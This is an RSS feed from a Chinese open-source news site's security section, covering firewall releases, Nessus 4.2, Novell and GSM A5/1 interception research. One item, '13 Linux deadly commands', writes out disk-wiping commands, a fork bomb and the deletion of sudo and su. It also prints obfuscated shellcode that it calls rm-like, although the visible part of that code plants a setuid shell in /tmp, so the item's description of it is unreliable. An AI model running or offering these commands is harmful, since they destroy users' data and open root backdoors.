<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Osss.cn 开源社区 &#187; 安全</title>
	<atom:link href="http://osss.cn/news/category/%e5%ae%89%e5%85%a8/feed/" rel="self" type="application/rss+xml" />
	<link>http://osss.cn/news</link>
	<description>分享、学习和传播自由&#38;开源软件FOSS</description>
	<lastBuildDate>Sat, 31 Jul 2010 10:39:22 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		
<!-- Start Of Script Generated By WP-PostViews Plus -->
<script type='text/javascript' src='http://osss.cn/news/wp-content/plugins/wp-prettyphoto/js/jquery-1.4.2.min.js?ver=1.4.2'></script>
<script type="text/javascript">
/* <![CDATA[ */
/* ]]> */
</script>
<!-- End Of Script Generated By WP-PostViews Plus -->
	<item>
		<title>开源防火墙IPFire2.7发布</title>
		<link>http://osss.cn/news/2010/07/05/%e5%bc%80%e6%ba%90%e9%98%b2%e7%81%ab%e5%a2%99ipfire2-7%e5%8f%91%e5%b8%83/</link>
		<comments>http://osss.cn/news/2010/07/05/%e5%bc%80%e6%ba%90%e9%98%b2%e7%81%ab%e5%a2%99ipfire2-7%e5%8f%91%e5%b8%83/#comments</comments>
		<pubDate>Mon, 05 Jul 2010 13:34:24 +0000</pubDate>
		<dc:creator>osss</dc:creator>
				<category><![CDATA[LINUX]]></category>
		<category><![CDATA[企业应用]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[IPFire]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=4904</guid>
		<description><![CDATA[经过5个候选版本发布，IPFire项目负责人Michael Tremer 宣布IPFire2.7开源防火墙发布。IPFire是一款基于Linux的发行版。可以通过CD/USB设备引导，同样可以安装到硬盘中。

这个新的版本基于最新的Linux2.6.32内核，修改了超过400多个错误，包括软件包更新，如OpenSSL 0.9.80，Memtest 4.10以及当前稳定的Squid Web代理版本. 其它更改包括VPN更新、增加了硬件支持、Web界面修改和性能提高。开发者称，目前还没有通过内部定制包管理，名为Pakpire，只有ISO文件发布，更新包要到7月9日才可以使用。

<span class="readmore"><a href="http://osss.cn/news/2010/07/05/%e5%bc%80%e6%ba%90%e9%98%b2%e7%81%ab%e5%a2%99ipfire2-7%e5%8f%91%e5%b8%83/" title="开源防火墙IPFire2.7发布">阅读全文——共419字</a></span>]]></description>
			<content:encoded><![CDATA[<p><a href="http://osss.cn/news/wp-content/uploads/2010/07/IPFire_Logo200-bc99c025008660a5.png" rel="wp-prettyPhoto[g4904]"><img class="alignleft size-full wp-image-4905" style="margin: 5px;" title="IPFire_Logo200-bc99c025008660a5" src="http://osss.cn/news/wp-content/uploads/2010/07/IPFire_Logo200-bc99c025008660a5.png" alt="" width="147" height="200" /></a>经过<a rel="external" href="http://www.ipfire.org/en/news" target="_blank">5个候选版本</a>发布，<a rel="external" href="http://www.ipfire.org/" target="_blank">IPFire</a>项目负责人Michael Tremer <a rel="external" href="http://forum.ipfire.org/index.php?topic=2539.0" target="_blank">宣布</a>IPFire2.7开源防火墙发布。IPFire是一款基于Linux的发行版。可以通过CD/USB设备引导，同样可以安装到硬盘中。</p>
<p>这个新的版本基于最新的Linux2.6.32内核，修改了超过400多个错误，包括软件包更新，如OpenSSL 0.9.80，<a rel="external" href="http://www.memtest.org/" target="_blank">Memtest 4.10</a>以及当前稳定的<a rel="external" href="http://www.squid-cache.org/" target="_blank">Squid</a> Web代理版本. 其它更改包括VPN更新、增加了硬件支持、Web界面修改和性能提高。开发者称，目前还没有通过内部定制包管理，名为Pakpire，只有ISO文件发布，更新包要到7月9日才可以使用。</p>
<p>更多详细关于IPFire，请查看<a rel="external" href="http://www.ipfire.org/en/news#38" target="_blank">官方发布公告</a>。IPFire 2.7 (Core 38)  <a rel="external" href="http://www.ipfire.org/en/download" target="_blank">下载</a>，同时也提供了<a rel="external" href="http://wiki.ipfire.org/en/installation/start" target="_blank">安装指南。</a></p>
<p>下一个主要版本IPFire3.0目前还在开发中，不过你可以尝试一下 首个<a rel="external" href="http://www.ipfire.org/en/downloads/development" target="_blank">alpha</a>，这个版本不能用来实际业务，仅做测试。IPFire基于GPLv3发布。</p>
<p>查看系统<a href="http://www.ipfire.org/en/screenshots">截屏演示</a></p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2010/07/05/%e5%bc%80%e6%ba%90%e9%98%b2%e7%81%ab%e5%a2%99ipfire2-7%e5%8f%91%e5%b8%83/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>2010年Novell 发力云计算</title>
		<link>http://osss.cn/news/2010/01/01/2010%e5%b9%b4novell-%e5%8f%91%e5%8a%9b%e4%ba%91%e8%ae%a1%e7%ae%97/</link>
		<comments>http://osss.cn/news/2010/01/01/2010%e5%b9%b4novell-%e5%8f%91%e5%8a%9b%e4%ba%91%e8%ae%a1%e7%ae%97/#comments</comments>
		<pubDate>Fri, 01 Jan 2010 13:31:36 +0000</pubDate>
		<dc:creator>openwill</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[novell]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=4487</guid>
		<description><![CDATA[【Osss.cn消息】2009年已经成为过去，全球最大的Linux解决方案提供商之一Novell公司经历痛苦的一年，在2009年12月发布的第四季度财报，公司净亏损2.56亿美金。两周后，公司宣布重组，将原来的身份与安全管理部门(ISM)，系统和资源管理(SRM)以及关注Linux开放平台解决方案部门(OPS)进行合并，合并后新的部门叫做安全管理和操作平台部门，还有另外一个业务部门叫合作与解决方案部门。

Novell中国业务全球第一

张先民在与CNET的访谈中，回顾了2009年Novell中国的成绩。他透露，“中国区业务在2009年成长了50%，在全球16个大区中是做得最好的一个市场。因此Novell总部决定对中国市场进行新一轮投资，这其中就设计云计算。”

<span class="readmore"><a href="http://osss.cn/news/2010/01/01/2010%e5%b9%b4novell-%e5%8f%91%e5%8a%9b%e4%ba%91%e8%ae%a1%e7%ae%97/" title="2010年Novell 发力云计算">阅读全文——共687字</a></span>]]></description>
			<content:encoded><![CDATA[<p><a href="http://osss.cn/news/wp-content/uploads/2010/01/zxm.jpg" rel="wp-prettyPhoto[g4487]"><img class="alignleft size-full wp-image-4488" style="margin-left: 6px; margin-right: 6px;" title="zxm" src="http://osss.cn/news/wp-content/uploads/2010/01/zxm.jpg" alt="" width="79" height="100" /></a>【Osss.cn消息】2009年已经成为过去，全球最大的Linux解决方案提供商之一Novell公司经历痛苦的一年，在2009年12月发布的<a href="http://osss.cn/news/2009/12/04/novell%E5%85%AC%E5%8F%B8%E5%8F%91%E5%B8%83%E8%B4%A2%E6%8A%A5%EF%BC%8C%E9%94%80%E5%94%AE%E7%BB%A7%E7%BB%AD%E4%B8%8B%E6%BB%91/">第四季度财报</a>，公司净亏损2.56亿美金。两周后，<a href="http://osss.cn/news/2009/12/16/novell%E5%85%AC%E5%8F%B8%E5%AE%A3%E5%B8%83%E9%87%8D%E7%BB%84/">公司宣布重组</a>，将原来的身份与安全管理部门(ISM)，系统和资源管理(SRM)以及关注Linux开放平台解决方案部门(OPS)进行合并，合并后新的部门叫做<strong>安全管理和操作平台部门</strong>，还有另外一个业务部门叫<strong>合作与解决方案部门</strong>。</p>
<h2>Novell中国业务全球第一</h2>
<p>张先民在与CNET的访谈中，回顾了2009年Novell中国的成绩。他透露，“中国区业务在2009年成长了50%，在全球16个大区中是做得最好的一个市场。因此Novell总部决定对中国市场进行新一轮投资，这其中就设计云计算。”</p>
<h2>2010年发力云计算</h2>
<p>2010年发力云计算，重组后的Novell公司，将变成一个更加专注于整合和敏捷的全球化公司，定位于一个智能工作负载管理解决方案，系统集成和身份管理，虚拟化和云计算的公司。</p>
<p>张先民说，“Novell将全力进入云计算市场，我2010年最大的任务就是把Novell从一个操作系统提供商向云计算解决方案提供商转型。”</p>
<p>据张先民透露Novell做构建、安全、管理、衡量等层面为客户提供云计算解决方案，云架构共分为多层：最底层是基础实施（服务器、存储等），向上是构建，再向上一层是管理、安全和优化，再向上是用户门户，计费，最上面一层则是提供云服务的各种服务商（IaaS、PaaS、SaaS），比如有亚马逊、谷歌、中国电信等等。</p>
<p>本文内容引用<a href="http://www.cnetnews.com.cn/2009/1231/1583888.shtml">CNET科技资讯网：Novell悄然涉足云计算 张先民：2010年加速转型</a></p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2010/01/01/2010%e5%b9%b4novell-%e5%8f%91%e5%8a%9b%e4%ba%91%e8%ae%a1%e7%ae%97/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>拦截移动手机通讯如此简单</title>
		<link>http://osss.cn/news/2009/12/29/%e6%8b%a6%e6%88%aa%e7%a7%bb%e5%8a%a8%e6%89%8b%e6%9c%ba%e9%80%9a%e8%ae%af%e5%a6%82%e6%ad%a4%e7%ae%80%e5%8d%95/</link>
		<comments>http://osss.cn/news/2009/12/29/%e6%8b%a6%e6%88%aa%e7%a7%bb%e5%8a%a8%e6%89%8b%e6%9c%ba%e9%80%9a%e8%ae%af%e5%a6%82%e6%ad%a4%e7%ae%80%e5%8d%95/#comments</comments>
		<pubDate>Tue, 29 Dec 2009 03:14:55 +0000</pubDate>
		<dc:creator>osss</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[26C3]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=4462</guid>
		<description><![CDATA[第26届混乱通讯大会（Chaos Communication Congress，简称C3，也称为Chaos Computer Club）于12月27日在德国柏林举行，C3大会是欧洲地区的顶级黑客大会，是黑客们的聚集地，它仅次于排名第一的黑帽大会。有兴趣朋友可以登陆26C3的官方网站（需要翻墙）可以了解更详细的内容。

OSSS.CN开源社区将在本文重点介绍关于移动通讯的安全问题。据26C3大会安全研究人员发布的开源指令，这套系统可以用来破解A5/1移动电话加密算法并建立IMSI（国际移动用户识别码）捕捉器用来拦截移动电话通信。全球移动通讯系统 (GSM)作为数字移动手机网络标准，被全球200个国家的40亿人所使用，现在看来是非常不安全的。以上所描述的是来自于著名的密码学专家Karsten Nohl演讲，他向在场的黑客展示了这个事实。其实上早在1994年学术届就有对此做过类似试验。

<span class="readmore"><a href="http://osss.cn/news/2009/12/29/%e6%8b%a6%e6%88%aa%e7%a7%bb%e5%8a%a8%e6%89%8b%e6%9c%ba%e9%80%9a%e8%ae%af%e5%a6%82%e6%ad%a4%e7%ae%80%e5%8d%95/" title="拦截移动手机通讯如此简单">阅读全文——共898字</a></span>]]></description>
			<content:encoded><![CDATA[<p>第26届混乱通讯大会（Chaos Communication Congress，简称C3，也称为Chaos Computer Club）于12月27日在德国柏林举行，C3大会是欧洲地区的顶级黑客大会，是黑客们的聚集地，它仅次于排名第一的黑帽大会。有兴趣朋友可以登陆<a rel="external" href="http://events.ccc.de/congress/2009/" target="_blank">26C3</a>的官方网站（需要翻墙）可以了解更详细的内容。</p>
<p>OSSS.CN开源社区将在本文重点介绍关于移动通讯的安全问题。据26C3大会安全研究人员发布的开源指令，这套系统可以用来破解A5/1移动电话加密算法并建立IMSI（国际移动用户识别码）捕捉器用来拦截移动电话通信。全球移动通讯系统 (GSM)作为数字移动手机网络标准，被全球200个国家的40亿人所使用，现在看来是非常不安全的。以上所描述的是来自于著名的密码学专家Karsten Nohl演讲，他向在场的黑客展示了这个事实。其实上早在1994年学术届就有对此做过类似试验。</p>
<p>Nohl是从去年夏天<a href="http://www.h-online.com/news/item/GSM-to-feel-the-heat-from-open-source-project-743127.html">开始了</a> 他的研究项目证明了移动电话通讯系统是有安全漏洞。基本问题是一个分布式的被动攻击A5/1，这种加密算法已经被专家称为不安全的，而且可以非常简单的破解它。</p>
<p>Nohl和他的团队表示他们找到了A5/1的密钥，这个密钥可以用来拦截GSM通讯，比想像中要简单的多。在大会现场的工作间中准备演示给观众看的硬件黑客说：“我们认为需要6个月时间来完成这件事，但没想到在3个月中通过40台计算机就完成了此事”。</p>
<p>根据Nohl，尽管GSM的背后单位<a rel="external" href="http://www.gsmworld.com/" target="_blank">GSMA</a> 产业协会表示主要的安全问题并不是GSM本身的加密标准，而是改变传输通道的使用方法。因此，黑客需要一个接收站处理原始数据和程序。 看来，GSM协会并没有意识到，这样的计算机系统已经可以通过免费<a rel="external" href="http://en.wikipedia.org/wiki/OpenBTS" target="_blank">的OpenBTS</a>软件建立GSM基站。</p>
<p>OpenBTS软件和免费的Asterisk软件组合可以帮助安全专家建立IMSI捕捉器破译GSM网络，而相同应用被德国警方以及情报部门用于定位移动手机用户，需要花费1500美金购买。很显然开源的解决方案可以做为更低成本来替代。</p>
<p>详情登陆<a rel="external" href="http://events.ccc.de/congress/2009/" target="_blank">26C3</a>的 官方网站（需要翻墙）</p>
<p>有关A5/1破解软件：<a href="http://reflextor.com/trac/a51">http://reflextor.com/trac/a51</a></p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/12/29/%e6%8b%a6%e6%88%aa%e7%a7%bb%e5%8a%a8%e6%89%8b%e6%9c%ba%e9%80%9a%e8%ae%af%e5%a6%82%e6%ad%a4%e7%ae%80%e5%8d%95/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nessus 4.2开源漏洞扫描工具发布[附截屏]</title>
		<link>http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/</link>
		<comments>http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/#comments</comments>
		<pubDate>Fri, 04 Dec 2009 14:01:38 +0000</pubDate>
		<dc:creator>osss</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[Nessus]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=4046</guid>
		<description><![CDATA[Nessus是一款非常优秀的开源漏洞扫描工具，被认为是目前全世界最多人使用的系统漏洞扫描与分析软件。该软件的4.2版本发布，这个新版本是有史以来发动最大的一次，首先就是增加了一个基于Web的用户界面，界面的美工做到极致，让人赞叹，可以见系统截屏。这个Web界面的推出，意味着是一个新的客户端，用户可以通过浏览器来管理设置系统。

详细功能请查看官方功能描述、下载、文档、插件。

系统截屏，点击放大

]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.tenablesecurity.com/nessus/"><img class="alignleft size-full wp-image-4060" style="margin-left: 6px; margin-right: 6px;" title="NessusLogo-9e60aec32eb934b1" src="http://osss.cn/news/wp-content/uploads/2009/12/NessusLogo-9e60aec32eb934b1.png" alt="NessusLogo-9e60aec32eb934b1" width="53" height="53" />Nessus</a>是一款非常优秀的开源漏洞扫描工具，被认为是目前全世界最多人使用的系统漏洞扫描与分析软件。该软件的<a href="href=&quot;http://blog.tenablesecurity.com/2009/11/nessus-42-released.html">4.2版本发布</a>，这个新版本是有史以来发动最大的一次，首先就是增加了一个基于Web的用户界面，界面的美工做到极致，让人赞叹，可以见系统截屏。这个Web界面的推出，意味着是一个新的客户端，用户可以通过浏览器来管理设置系统。</p>
<p>详细功能请查看官方<a href="http://www.tenablesecurity.com/nessus/features/">功能描述</a>、<a href="http://www.tenablesecurity.com/download/">下载</a>、<a href="http://www.tenablesecurity.com/documentation/">文档</a>、<a href="http://www.tenablesecurity.com/plugins/">插件</a>。</p>
<h1>系统截屏，点击放大</h1>

<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_fdcc/' title='nessus4_2_fdcc'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_fdcc-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_fdcc" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_html_export/' title='nessus4_2_html_export'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_html_export-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_html_export" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_pci/' title='nessus4_2_pci'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_pci-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_pci" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_pci_config/' title='nessus4_2_pci_config'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_pci_config-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_pci_config" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_policy_selection/' title='nessus4_2_policy_selection'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_policy_selection-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_policy_selection" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_scada/' title='nessus4_2_scada'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_scada-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_scada" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_scan_results1/' title='nessus4_2_scan_results1'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_scan_results1-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_scan_results1" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_scan_results2/' title='nessus4_2_scan_results2'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_scan_results2-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_scan_results2" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_scan_results/' title='nessus4_2_scan_results'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_scan_results-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_scan_results" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_ss_login/' title='nessus4_2_ss_login'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_ss_login-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_ss_login" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_ss_plugin_selection/' title='nessus4_2_ss_plugin_selection'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_ss_plugin_selection-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_ss_plugin_selection" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_ss_policy_editing/' title='nessus4_2_ss_policy_editing'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_ss_policy_editing-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_ss_policy_editing" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessus4_2_ss_policy_password_editing/' title='nessus4_2_ss_policy_password_editing'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/nessus4_2_ss_policy_password_editing-150x150.png" class="attachment-thumbnail" alt="" title="nessus4_2_ss_policy_password_editing" /></a>
<a href='http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/nessuslogo-9e60aec32eb934b1/' title='NessusLogo-9e60aec32eb934b1'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/NessusLogo-9e60aec32eb934b1-150x150.png" class="attachment-thumbnail" alt="" title="NessusLogo-9e60aec32eb934b1" /></a>

]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/12/04/nessus-4-2%e5%bc%80%e6%ba%90%e6%bc%8f%e6%b4%9e%e6%89%ab%e6%8f%8f%e5%b7%a5%e5%85%b7%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>13 Linux致命命令</title>
		<link>http://osss.cn/news/2009/12/04/13-linux%e8%87%b4%e5%91%bd%e5%91%bd%e4%bb%a4/</link>
		<comments>http://osss.cn/news/2009/12/04/13-linux%e8%87%b4%e5%91%bd%e5%91%bd%e4%bb%a4/#comments</comments>
		<pubDate>Fri, 04 Dec 2009 09:28:06 +0000</pubDate>
		<dc:creator>osss</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[教程]]></category>
		<category><![CDATA[LINUX]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=4028</guid>
		<description><![CDATA[在linuxscrew.com上的一文章，关于Linux下几个致命的命令，可以很轻松的OVER你的计算机。这些命令对于一些Linux的系统管理员来说，也许是非常熟悉了。

1. 以下命令可以很容易把你计算机磁盘上的数据清除掉。



<span class="readmore"><a href="http://osss.cn/news/2009/12/04/13-linux%e8%87%b4%e5%91%bd%e5%91%bd%e4%bb%a4/" title="13 Linux致命命令">阅读全文——共904字</a></span>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2204" title="linux" src="http://osss.cn/news/wp-content/uploads/2009/09/linux.jpg" alt="linux" width="45" height="54" />在linuxscrew.com上的一文章，关于Linux下几个致命的命令，可以很轻松的OVER你的计算机。这些命令对于一些Linux的系统管理员来说，也许是非常熟悉了。</p>
<p>1. 以下命令可以很容易把你计算机磁盘上的数据清除掉。</p>
<ul>
<li><strong>sudo rm -rf /</strong></li>
<li><strong>rm -rf .* </strong></li>
<li><strong>dd if=/dev/zero of=/dev/sda</strong></li>
<li><strong>mkfs.ext3 /dev/hda</strong></li>
<li><strong>whatever &gt; /dev/hda</strong></li>
<li><strong>cd ~; for x in `ls`; do mv -f $x $y; y=$x; done </strong></li>
<li><strong>find -type f -mtime +30 -exec mv {} /dev/null \;</strong></li>
<li><strong>mv ~ /dev/null</strong></li>
<li><strong>mv / /dev/null</strong></li>
</ul>
<p>2. 以下命令将引起内核异常:</p>
<ul>
<li><strong>dd if=/dev/random of=/dev/port</strong></li>
<li><strong> <img src='http://osss.cn/news/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> ){:|:&amp;};:</strong> #also known as <a href="http://en.wikipedia.org/wiki/Fork_bomb">fork bomb</a></li>
</ul>
<p>3. 这个命令类似“rm -rf /”:</p>
<p><strong>char esp[] __attribute__ ((section(”.text”))) /* e.s.p<br />
release */<br />
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″<br />
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″<br />
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″<br />
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″<br />
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″<br />
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″<br />
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″<br />
“cp -p /bin/sh /tmp/.beyond; chmod 4755<br />
/tmp/.beyond;”;</strong></p>
<p>4. 这个命令将预防来自 root 权限执行命令</p>
<p><strong>rm -f /usr/bin/sudo;rm -f /bin/su</strong></p>
<p>我想应该还有其它更多的命令，可以摧毁Linux。有兴趣朋友不防在评论中跟上！</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/12/04/13-linux%e8%87%b4%e5%91%bd%e5%91%bd%e4%bb%a4/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>功能强悍的m0n0wall 1.3防火墙发布[附截屏]</title>
		<link>http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/</link>
		<comments>http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/#comments</comments>
		<pubDate>Wed, 02 Dec 2009 05:04:44 +0000</pubDate>
		<dc:creator>osss</dc:creator>
				<category><![CDATA[企业应用]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[m0n0wall]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=3936</guid>
		<description><![CDATA[Manuel Kasper宣布m0n0wall 1.3发布，这个版本经过了3年的测试，现在已经非常成熟，用官方的话说，这是一个足够好的产品。 m0n0wall 1.3基于FreeBSD 6.4的 &#8220;bare-bones 版本&#8221; ，提供非常友好的Web界面来管理访问系统，通过PHP语言来实现Web配置防火墙的功能，整个系统通过单个XML文本文件实现配置。m0n0wall 1.3包括支持IPv6，IPsec traffic，IPsec NAT-T，DPD 和动态隧道以及无数的Bug修正和其它性能改善。此前发布的三个不同版本(net45xx, net48xx和wrap)，在m0n0wall 1.3中，合为一体，嵌入式镜像。更多信息可以查看m0n0wall更改日志。m0n0wall 1.3的嵌入式镜像和CDROM镜像，普通PCs和虚拟机可以在到官方网站上下载 。

<span class="readmore"><a href="http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/" title="功能强悍的m0n0wall 1.3防火墙发布[附截屏]">阅读全文——共404字</a></span>]]></description>
